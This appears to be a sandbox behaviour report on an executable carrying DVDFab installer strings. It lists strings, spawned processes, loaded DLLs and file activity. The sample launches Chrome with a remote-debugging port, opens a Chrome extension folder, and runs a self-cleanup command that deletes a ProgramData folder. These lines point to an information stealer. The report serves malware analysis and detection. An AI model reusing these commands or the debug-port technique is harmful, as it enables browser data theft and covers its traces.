Source: chrome.exe, 00000008.00000002.1479849234.00001ECC03CE0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: SELECT COUNT(id) FROM metrics WHERE metrics.metric_hash = '64BD7CCE5A95BF00';
Source: w4wb168q1.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: chrome.exe, 00000008.00000002.1479678271.00001ECC03C90000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: SELECT IFNULL(SUM(metrics.metric_value), 0) FROM metrics WHERE metrics.metric_hash = '79964621D357AB88';
Source: chrome.exe, 00000008.00000002.1479799636.00001ECC03CB4000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: SELECT IFNULL(SUM(metrics.metric_value), 0) FROM metrics WHERE metrics.metric_hash = '534661B278B11BD';

Source: Cm2GRjWK1C.exe	String found in binary or memory: -help
Source: Cm2GRjWK1C.exe	String found in binary or memory: ?h-helpbabdbtbbbsoCannot find listfileIncorrect item in listfile.
Source: Cm2GRjWK1C.exe	String found in binary or memory: Download fehlgeschlagen, bitte versuchen Sie es erneut oder downloaden Sie den Offline-Installer aus www.dvdfab.cn.D
Source: Cm2GRjWK1C.exe	String found in binary or memory: es do download...Das Online-Installationsprogramm ist zu alt, bitte downloaden Sie die neuste Version unter de.dvdfab.cn.
Source: Cm2GRjWK1C.exe	String found in binary or memory: ./..//.//./..//....No errorUnsupported protocolFailed initializationURL using bad/illegal format or missing URLA requested feature, protocol or option was not found built-in in this libcurl due to a build-time decision.Couldn't resolve proxy nameCouldn't resolve host nameCouldn't connect to serverWeird server replyAccess denied to remote resourceFTP: The server failed to connect to data portFTP: Accepting server connect has timed outFTP: The server did not accept the PRET command.FTP: unknown PASS replyFTP: unknown PASV replyFTP: unknown 227 response formatFTP: can't figure out the host in the PASV responseError in the HTTP2 framing layerFTP: couldn't set file typeTransferred a partial fileFTP: couldn't retrieve (RETR failed) the specified fileQuote command returned errorHTTP response code said errorFailed writing received data to disk/applicationUpload failed (at start/before it took off)Failed to open/read local data from file/applicationOut of memoryTimeout was reachedFTP: command PORT failedFTP: command REST failedRequested range was not delivered by the serverInternal problem setting up the POSTSSL connect errorCouldn't resume downloadCouldn't read a file:// fileLDAP: cannot bindLDAP: search failedA required function in the library was not foundOperation was aborted by an application callbackA libcurl function was given a bad argumentFailed binding local connection endNumber of redirects hit maximum amountAn unknown option was passed in to libcurlMalformed telnet optionSSL peer certificate or SSH remote key was not OKServer returned nothing (no headers, no data)SSL crypto engine not foundCan not set SSL crypto engine as defaultFailed to initialise SSL crypto engineFailed sending data to the peerFailure when receiving data from the peerProblem with the local SSL certificateCouldn't use specified SSL cipherPeer certificate cannot be authenticated with given CA certificatesProblem with the SSL CA cert (path? access rights?)Unrecognized or bad HTTP Content or Transfer-EncodingInvalid LDAP URLRequested SSL level failedFailed to shut down the SSL connectionFailed to load CRL file (path? access rights?, format?)Issuer check against peer certificate failedSend failed since rewinding of the data stream failedLogin deniedTFTP: File Not FoundTFTP: Access ViolationDisk full or allocation exceededTFTP: Illegal operationTFTP: Unknown transfer IDRemote file already existsTFTP: No such userConversion failedCaller must register CURLOPT_CONV_ callback optionsRemote file not foundError in the SSH layerSocket not ready for send/recvRTSP CSeq mismatch or invalid CSeqRTSP session errorUnable to parse FTP file listChunk callback failedThe max connection limit is reachedSSL public key does not match pinned public keySSL server certificate status verification FAILEDStream error in the HTTP/2 framing layerAPI function called from within callbackUnknown errorCall interruptedBad fileBad accessBad argumentInvalid argumentsOut of file descriptorsCall would blockBlocking
Source: Cm2GRjWK1C.exe	String found in binary or memory: set-addPolicy
Source: Cm2GRjWK1C.exe	String found in binary or memory: LOGINPLAINCRAM-MD5DIGEST-MD5GSSAPIEXTERNALXOAUTH2OAUTHBEARERAQ==Unsupported SASL authentication mechanism -> total rwx-tTsS0123456789-APM0123456789:<DIR>KGS!@#$%%c%c%c%c%c%c%c%c%s/%s@%s%s@%ssetct-CredReqTBSXsetct-CredResDatasetct-CredRevReqTBSsetct-CredRevReqTBSXsetct-CredRevResDatasetct-PCertReqDatasetct-PCertResTBSsetct-BatchAdminReqDatasetct-BatchAdminResDatasetct-CardCInitResTBSsetct-MeAqCInitResTBSsetct-RegFormResTBSsetct-CertReqDatasetct-CertReqTBSsetct-CertResDatasetct-CertInqReqTBSsetct-ErrorTBSsetct-PIDualSignedTBEsetct-PIUnsignedTBEsetct-AuthReqTBEsetct-AuthResTBEsetct-AuthResTBEXsetct-AuthTokenTBEsetct-CapTokenTBEsetct-CapTokenTBEXsetct-AcqCardCodeMsgTBEsetct-AuthRevReqTBEsetct-AuthRevResTBEsetct-AuthRevResTBEBsetct-CapReqTBEsetct-CapReqTBEXsetct-CapResTBEsetct-CapRevReqTBEsetct-CapRevReqTBEXsetct-CapRevResTBEsetct-CredReqTBEsetct-CredReqTBEXsetct-CredResTBEsetct-CredRevReqTBEsetct-CredRevReqTBEXsetct-CredRevResTBEsetct-BatchAdminReqTBEsetct-BatchAdminResTBEsetct-RegFormReqTBEsetct-CertReqTBEsetct-CertReqTBEXsetct-CertResTBEsetct-CRLNotificationTBSsetct-CRLNotificationResTBSsetct-BCIDistributionTBSsetext-genCryptgeneric cryptogramsetext-miAuthmerchant initiated authsetext-pinSecuresetext-pinAnysetext-track2setext-cvadditional verificationset-policy-rootsetCext-hashedRootsetCext-certTypesetCext-merchDatasetCext-cCertRequiredsetCext-tunnelingsetCext-setExtsetCext-setQualfsetCext-PGWYcapabilitiessetCext-TokenIdentifiersetCext-Track2DatasetCext-TokenTypesetCext-IssuerCapabilitiessetAttr-CertsetAttr-PGWYcappayment gateway capabilitiessetAttr-TokenTypesetAttr-IssCapissuer capabilitiesset-rootKeyThumbset-addPolicysetAttr-Token-EMVsetAttr-Token-B0PrimesetAttr-IssCap-CVMsetAttr-IssCap-T2setAttr-IssCap-SigsetAttr-GenCryptgrmgenerate cryptogramsetAttr-T2Encencrypted track 2setAttr-T2cleartxtcleartext track 2setAttr-TokICCsigICC or token signaturesetAttr-SecDevSigsecure device signatureset-brand-IATA-ATAset-brand-Dinersset-brand-AmericanExpressset-brand-JCBset-brand-Visaset-brand-MasterCardset-brand-NovusDES-CDMFdes-cdmfrsaOAEPEncryptionSETITU-Titu-tJOINT-ISO-ITU-Tjoint-iso-itu-tinternational-organizationsInternational OrganizationsmsSmartcardLoginMicrosoft SmartcardloginmsUPNMicrosoft Universal Principal NameAES-128-CFB1aes-128-cfb1AES-192-CFB1aes-192-cfb1AES-256-CFB1aes-256-cfb1AES-128-CFB8aes-128-cfb8AES-192-CFB8aes-192-cfb8AES-256-CFB8aes-256-cfb8DES-CFB1des-cfb1DES-CFB8des-cfb8DES-EDE3-CFB1des-ede3-cfb1DES-EDE3-CFB8des-ede3-cfb8streetstreetAddresspostalCodeid-pplproxyCertInfoProxy Certificate Informationid-ppl-anyLanguageAny languageid-ppl-inheritAllInherit allnameConstraintsX509v3 Name Constraintsid-ppl-independentIndependentRSA-SHA256sha256WithRSAEncryptionRSA-SHA384sha384WithRSAEncryptionRSA-SHA512sha512WithRSAEncryptionRSA-SHA224sha224WithRSAEncryptionsha256sha384SHA512sha512SHA224sha224identified-organizationcerticom-arcwapwap-wsgid-characteristic-two-basisonBasistpBasisppBasisc2pnb163v1c2pnb163v2c2pnb163v3c2pnb176v1c2tnb191v1c2tnb191v2c
Source: Cm2GRjWK1C.exe	String found in binary or memory: id-cmc-addExtensions
Source: Cm2GRjWK1C.exe	String found in binary or memory: Run MainExe.exe /install
Source: Cm2GRjWK1C.exe	String found in binary or memory: /install /very_silent / add_plan /output_progress:Install Params %s
Source: Cm2GRjWK1C.exe	String found in binary or memory: (x64) (x64)uninstall.exe/very_silentuninstall.exe Mini (x64)DVDfabMini64.ico MiniDVDfabMini.ico --minimode --minimode --minimodeMini (x64)(x64) Mini.lnkDVDFab 12FabRepair.exeRun FabRepair.exerunasFabRepair.exefabtech_all_in_one_setupFabTechFabTech64.exeFabTech 1FabTechVideoConverterSetup.exeFabTech Photo Enhancer AIFabTech Photo Enhancer AI.exeFabTech Photo Enhancer AIFabTechPhotoEnhancerAISetup.exeFabTech Video UpscalerFabTech Video Upscaler.exeFabTech Video UpscalerFabTechVideoUpscalerSetup.exe/install /very_silent /desktop /output_progress: /install_path""Install File %s
Source: Cm2GRjWK1C.exe	String found in binary or memory: Finish and Close Setup!FabDebugConfig.inishow_info_viewrootLog\Loginstall.log (x64)Start Kill and Remove DVDFabPasskey.exeDVDFabPasskey.exeKill DVDFabPasskey.exe successRemove DVDFabPasskey.exe successDVDFab Passkey 9DVDFabPasskey.exePasskeyDVDFabPasskey.exeRun MainExe.exe /installRun MainExe.exe /installrunas/XIRun MainExe.exe finishRun exe failed. main exe con't found
Source: Cm2GRjWK1C.exe	String found in binary or memory: official ().exewww.dvdfab.cn%s/s%%.0f%s%d%%open%dXXX:%dXXX&v=open&v=open --option /uimodule= --module= --ui-module= --installsource /source= --source= --app_from=" "Run Fab!!! %s - %s
Source: Cm2GRjWK1C.exe	String found in binary or memory: UpdateCtrlStatus(AfterInstall)Finish(AfterInstall) --installmode --runappsilent --installmode --runappauto_run_app /desktop/start_mode_online /very_silent /output_progress: /install_path""Option: %s.
Source: Cm2GRjWK1C.exe	String found in binary or memory: UpdateCtrlStatus(AfterInstall)Finish(AfterInstall) --installmode --runappsilent --installmode --runappauto_run_app /desktop/start_mode_online /very_silent /output_progress: /install_path""Option: %s.
Source: Cm2GRjWK1C.exe	String found in binary or memory: --installmode --runappOnBtnInstall(MySkinMessagxBox)OnBtnInstall(MySkinMessagxBox)OnBtnInstall(MySkinMessagxBox)C:\FreeSpace Info : %lld MB in %s .
Source: Cm2GRjWK1C.exe	String found in binary or memory: --installmodesilentOnBtnInstall(OnInstall)OnBtnInstall(what ???)&v=openbotton
Source: Cm2GRjWK1C.exe	String found in binary or memory: uninstall.exeCreate DESKTOP Icons Finish.Create START_MENU Icons Finish.Create COMMON_MENU Icons Finish..lnkEnd delete Icon.Run MainExe.exe /installrunas/install/install /add_plan /ID:/install /add_plan /new --app-from --app-from official /option: /uimodule= --module= --ui-module= /source: /source= --source= /time:%d Run Install Params: %s.
Source: Cm2GRjWK1C.exe	String found in binary or memory: uninstall.exeCreate DESKTOP Icons Finish.Create START_MENU Icons Finish.Create COMMON_MENU Icons Finish..lnkEnd delete Icon.Run MainExe.exe /installrunas/install/install /add_plan /ID:/install /add_plan /new --app-from --app-from official /option: /uimodule= --module= --ui-module= /source: /source= --source= /time:%d Run Install Params: %s.
Source: Cm2GRjWK1C.exe	String found in binary or memory: runaswinstore /install/uninstall/silent/very_silent/app_from:/desktop/no_desktop/no_add_plan/thank_you/output_progress:/option:/source:/runapp/start_mode_online/file/install_pathCmd Line : %sCmd Num : %d\Log\install.log\install.dmp
Source: Cm2GRjWK1C.exe	String found in binary or memory: x64x86vdrive.sysvdrive.sysSleep 1000Run MainExe.exe /installrunas/install /XI:Run Install Params: %s.

Source: unknown	Process created: C:\Users\user\Desktop\Cm2GRjWK1C.exe "C:\Users\user\Desktop\Cm2GRjWK1C.exe"
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2348,i,6494542625534998801,13089621614096395101,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2452 /prefetch:3
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\dba1d" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 11
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\dba1d" & exit	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2348,i,6494542625534998801,13089621614096395101,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2452 /prefetch:3	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 11	Jump to behavior

Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Section loaded: dbgcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll	Jump to behavior

Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: Cm2GRjWK1C.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: Cm2GRjWK1C.exe

Static file information: File size 8282848 > 1048576

Source: Cm2GRjWK1C.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x2b8a00
Source: Cm2GRjWK1C.exe	Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x41a000

Source: Cm2GRjWK1C.exe

Static PE information: More than 200 imports for KERNEL32.dll

Source: Cm2GRjWK1C.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Cm2GRjWK1C.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Cm2GRjWK1C.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Cm2GRjWK1C.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Cm2GRjWK1C.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Cm2GRjWK1C.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: Cm2GRjWK1C.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: Cm2GRjWK1C.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: f:\workspace\installer\online\setup\Release\R_Online.pdb source: Cm2GRjWK1C.exe

Source: Cm2GRjWK1C.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Cm2GRjWK1C.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Cm2GRjWK1C.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Cm2GRjWK1C.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Cm2GRjWK1C.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Source: C:\Windows\SysWOW64\timeout.exe TID: 3888

Thread sleep count: 99 > 30

Jump to behavior

Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Code function: 0_3_02D4B6B0 FindFirstFileA,FindNextFileA,strlen,StrCmpCA,CopyFileA,Sleep,DeleteFileA,FindClose,	0_3_02D4B6B0
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Code function: 0_3_02D55EB0 SHGetFolderPathA,wsprintfA,FindFirstFileA,FindNextFileA,_mbscpy,_splitpath,_mbscpy,strlen,isupper,wsprintfA,_mbscpy,strlen,SHFileOperation,FindClose,	0_3_02D55EB0
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Code function: 0_3_02D54E70 wsprintfA,FindFirstFileA,DeleteFileA,FindNextFileA,strlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,CopyFileA,FindClose,	0_3_02D54E70
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Code function: 0_3_02D47210 ExpandEnvironmentStringsA,FindFirstFileA,FindNextFileA,strlen,StrCmpCA,CopyFileA,Sleep,CopyFileA,DeleteFileA,CopyFileA,DeleteFileA,memset,CopyFileA,DeleteFileA,memset,FindClose,	0_3_02D47210
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Code function: 0_3_02D53FD0 wsprintfA,FindFirstFileA,FindNextFileA,strlen,FindClose,	0_3_02D53FD0
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Code function: 0_3_02D413F0 FindFirstFileA,FindClose,FindNextFileA,strlen,FindFirstFileA,DeleteFileA,FindNextFileA,CopyFileA,CopyFileA,DeleteFileA,FindClose,	0_3_02D413F0
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Code function: 0_3_02D53580 wsprintfA,FindFirstFileA,memset,memset,FindNextFileA,strlen,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,strtok_s,memset,lstrcat,strtok_s,PathMatchSpecA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindClose,	0_3_02D53580
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Code function: 0_3_02D497B0 FindFirstFileA,FindNextFileA,strlen,	0_3_02D497B0
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Code function: 0_3_02D48360 FindFirstFileA,CopyFileA,FindNextFileA,strlen,CopyFileA,FindClose,	0_3_02D48360
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Code function: 0_3_02D4ACD0 wsprintfA,FindFirstFileA,strlen,lstrlen,DeleteFileA,CopyFileA,FindClose,	0_3_02D4ACD0
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Code function: 0_3_02D48C90 lstrcpy,lstrcat,FindFirstFileA,FindNextFileA,strlen,lstrcpy,memset,lstrcpy,CopyFileA,FindFirstFileA,FindNextFileA,strlen,lstrcpy,lstrcpy,CopyFileA,FindClose,FindClose,DeleteFileA,	0_3_02D48C90
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Code function: 0_3_02D54950 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,strlen,FindClose,lstrlen,lstrlen,	0_3_02D54950

Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe

Code function: 0_3_02D53AF0 GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrlen,

0_3_02D53AF0

Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe

Code function: 0_3_02D4FDD0 GetSystemInfo,wsprintfA,

0_3_02D4FDD0

Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: chrome.exe, 00000008.00000002.1466824910.00000241C0E7D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor8
Source: chrome.exe, 00000008.00000002.1475944559.00001ECC02F60000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: VMware
Source: chrome.exe, 00000008.00000003.1415866773.00000241C3394000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1417238734.00000241C3395000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1416826257.00000241C3395000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1466824910.00000241C0E66000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1466824910.00000241C0EAD000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1416272678.00000241C338D000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1417565247.00000241C3396000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1416038141.00000241C338D000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1467433951.00000241C3372000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1417045580.00000241C3395000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Dynamic 